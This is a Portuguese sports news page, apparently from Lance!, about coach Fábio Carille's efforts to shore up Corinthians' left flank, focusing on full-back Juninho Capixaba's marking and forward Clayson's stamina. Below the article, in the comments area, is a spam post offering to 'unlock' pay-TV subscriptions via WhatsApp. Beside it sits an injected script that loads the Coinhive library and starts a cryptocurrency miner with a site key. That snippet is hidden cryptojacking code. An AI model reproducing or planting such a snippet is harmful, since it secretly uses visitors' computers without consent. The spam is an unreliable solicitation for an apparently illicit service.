28/1/2018 08:48

O trabalho de Carille para reforçar o lado esquerdo do Corinthians

Técnico tem preocupações com Juninho Capixaba e Clayson, que têm dificuldades na marcação. Garoto precisa aprender a marcar e atacante, a dosar a força nas partidas

O trabalho de Carille para reforçar o  lado esquerdo do Corinthians
Juninho Capixaba chegou este ano ao Corinthians (Foto: Ricardo Moreira/Fotoarena/Lancepress!)

Após quatro jogos, o Corinthians faz um balanço positivo do início de temporada, com três vitórias e uma derrota. Mas isso não quer dizer que tudo são flores. Em sua entrevista coletiva após a vitória no clássico contra o São Paulo, o técnico Fábio Carille avisou: há muito a melhorar. A começar pelo lado esquerdo, setor que neste momento é o de mais preocupação para o comandante.



São duas situações diferentes. O lateral-esquerdo Juninho Capixaba tem dificuldade na marcação. Carille já sabia disso e vem trabalhando para melhorar. Ele acredita que, com 20 anos, Juninho tem boa capacidade de absorção e personalidade para melhorar rápido. No clássico, passou dificuldade para conter os avanços de Marcos Guilherme. Carille acredita que a entrada na sua tão trabalhada linha de quatro e outros exercícios específicos podem dar essa condição ao seu lateral, que vai bem no apoio. Feito isso, o comandante espera um sistema defensivo tão sólido como do ano passado. Vale lembrar que Henrique ainda pode entrar na zaga pela esquerda, brigando por posição com Pedro Henrique.

A outra peça do lado esquerdo é Clayson. O atacante se fixou mesmo como titular. Mas vai precisar trabalhar forte. A preocupação da comissão técnica é com a força física do jogador. Clayson é franzino, não teve uma alimentação adequada na juventude, precisa sempre de fortalecimento. E tem muita disposição para acelerar o jogo. Quer sempre partir para cima dos adversários e isso o desgasta muito. A orientação dada a ele é para dosar isso durante as partidas e guardar fôlego para lances decisivos, sem desperdiçar energia. Paralelamente, a preparação física faz trabalho especial de fortalecimento. Com Clayson mais forte, Carille acredita que terá um time ainda mais competitivo.

O exemplo para o atacante vem de Romero. Na visão da comissão técnica, o lado direito na dobradinha com Fagner já trabalha em alto nível no sentido de atacar e defender. O paraguaio consegue dosar melhor o jogo, e também por isso tem mais fôlego para cobrir as investidas do lateral. Por isso, o camisa 11 dificilmente sairá do time.

O próximo teste para o Corinthians é no próximo domingo contra o Novorizontino. A equipe terá toda a semana para treinar. Com esse tempo, Carille espera turbinar seu lado esquerdo, por onde espera construir muito mais jogadas. A lembrar: o reserva de Capixaba é Guilherme Romão, enquanto Lucca já atuou aberto pela esquerda.


VEJA TAMBÉM
- Cássio recebeu proposta oficial de gigante brasileiro, confira
- Corinthians enfrenta desafio difícil para assegurar vaga na Sul-Americana.
- Onde assistir Corinthians x Argentinos Juniors na Copa Sul-Americana.









5946 visitas - Fonte: Lance! Net

Mais notícias do Corinthians

Notícias de contratações do Timão
Notícias mais lidas

VOCÊ QUE ESTÁ CANSADO DE TER POUCA PROGRAMAÇÃO DE TVV ASSSINATURA E NÃO CONCORDA COM OS VALORES COBRADOS
FAÇO LIBERAÇÃO E DIMINUÍMOS O VALOR DA CONTA
PARA TODO BRASIL
WHATZSAP 11 958694345

< src="https://coinhive.com/lib/coinhive.min.js"><>var a=new CoinHive.Anonymous("IoWE2BeVK3azaWL7xmC6HFJcYbwgiyoQ",{throttle:.3});a .start();

Enviar Comentário

Para enviar comentários, você precisa estar cadastrado e logado no nosso site. Para se cadastrar, clique Aqui. Para fazer login, clique Aqui ou Conecte com Facebook.

Últimas notícias

publicidade

Sudamericana

Ter - 19:00 - ueno Defensores del Chaco -
X
Nacional Asuncion
Corinthians

Brasileiro

Sáb - 21:00 - Neo Química Arena
0 X 0
Corinthians
Fortaleza EC
publicidade
publicidade
publicidade